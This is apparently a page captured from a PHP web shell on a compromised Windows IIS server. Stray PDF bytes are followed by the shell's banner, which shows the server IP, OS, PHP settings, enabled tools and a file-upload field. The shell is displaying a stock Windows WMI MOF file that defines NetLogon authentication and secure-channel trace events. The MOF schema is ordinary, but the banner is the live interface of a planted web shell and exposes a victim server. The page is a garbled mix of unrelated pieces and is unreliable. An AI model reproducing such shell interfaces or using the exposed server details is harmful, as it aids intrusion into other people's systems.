%PDF-1.5 %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµùÕ5sLOšuY
| Server IP : 122.154.253.140 / Your IP : 216.73.216.110 Web Server : Microsoft-IIS/7.5 System : Windows NT SERVER02 6.1 build 7601 (Windows Server 2008 R2 Standard Edition Service Pack 1) i586 User : IUSR ( 0) PHP Version : 5.6.31 Disable Function : NONE MySQL : ON | cURL : ON | WGET : OFF | Perl : OFF | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : C:/Windows/System32/wbem/ |
Upload File : |
//*********************************************
// *** Active Directory Service Provider: NetLogon
//*********************************************
#pragma autorecover
#pragma classflags("forceupdate")
#pragma namespace ("\\\\.\\Root\\WMI")
[Dynamic,
Description("Active Directory: NetLogon") : amended,
Guid("{f33959b4-dbec-11d2-895b-00c04f79ab69}"),
locale("MS\\0x409")]
class MSNetLogonTrace:EventTrace
{
};
[Dynamic,
Description("NetLogon Server Authentication") : amended,
Guid("{393da8c0-dbed-11d2-895b-00c04f79ab69}"),
DisplayName("NlServerAuth"),
locale("MS\\0x409")
]
class NlServerAuth:MSNetLogonTrace
{
};
[Dynamic,
Description("NetLogon Server Authentication") : amended,
EventType(1),
EventTypeName("Start"),
locale("MS\\0x409")
]
class NlServerAuth_Start:NlServerAuth
{
[WmiDataId(1),
Description("Client") : amended,
StringTermination("NullTerminated"),
format("w"),
read]
string Client;
[WmiDataId(2),
Description("Account") : amended,
StringTermination("NullTerminated"),
format("w"),
read]
string Account;
[WmiDataId(3),
Description("Channel Type") : amended,
format("x"),
read]
uint32 ChannelType;
[WmiDataId(4),
Description("Negotiated Flags") : amended,
format("x"),
read]
uint32 NegotiatedFlags;
};
[Dynamic,
Description("NetLogon Server Authentication") : amended,
EventType(2),
EventTypeName("End"),
locale("MS\\0x409")
]
class NlServerAuth_End:NlServerAuth
{
[WmiDataId(1),
Description("Client") : amended,
StringTermination("NullTerminated"),
format("w"),
read]
string Client;
[WmiDataId(2),
Description("Account") : amended,
StringTermination("NullTerminated"),
format("w"),
read]
string Account;
[WmiDataId(3),
Description("Channel Type") : amended,
format("x"),
read]
uint32 ChannelType;
[WmiDataId(4),
Description("Negotiated Flags") : amended,
format("x"),
read]
uint32 NegotiatedFlags;
[WmiDataId(5),
Description("Status") : amended,
format("x"),
read]
uint32 Status;
};
[Dynamic,
Description("NetLogon Secure Channel Setup") : amended,
Guid("{63dbb180-dbed-11d2-895b-00c04f79ab69}"),
DisplayName("NlSecChanlSetup"),
locale("MS\\0x409")
]
class NlSecChanlSetup:MSNetLogonTrace
{
};
[Dynamic,
Description("NetLogon Secure Channel Setup") : amended,
EventType(1),
EventTypeName("Start"),
locale("MS\\0x409")
]
class NlSecChanlSetup_Start:NlSecChanlSetup
{
};
[Dynamic,
Description("NetLogon Secure Channel Setup") : amended,
EventType(2),
EventTypeName("End"),
locale("MS\\0x409")
]
class NlSecChanlSetup_End:NlSecChanlSetup
{
};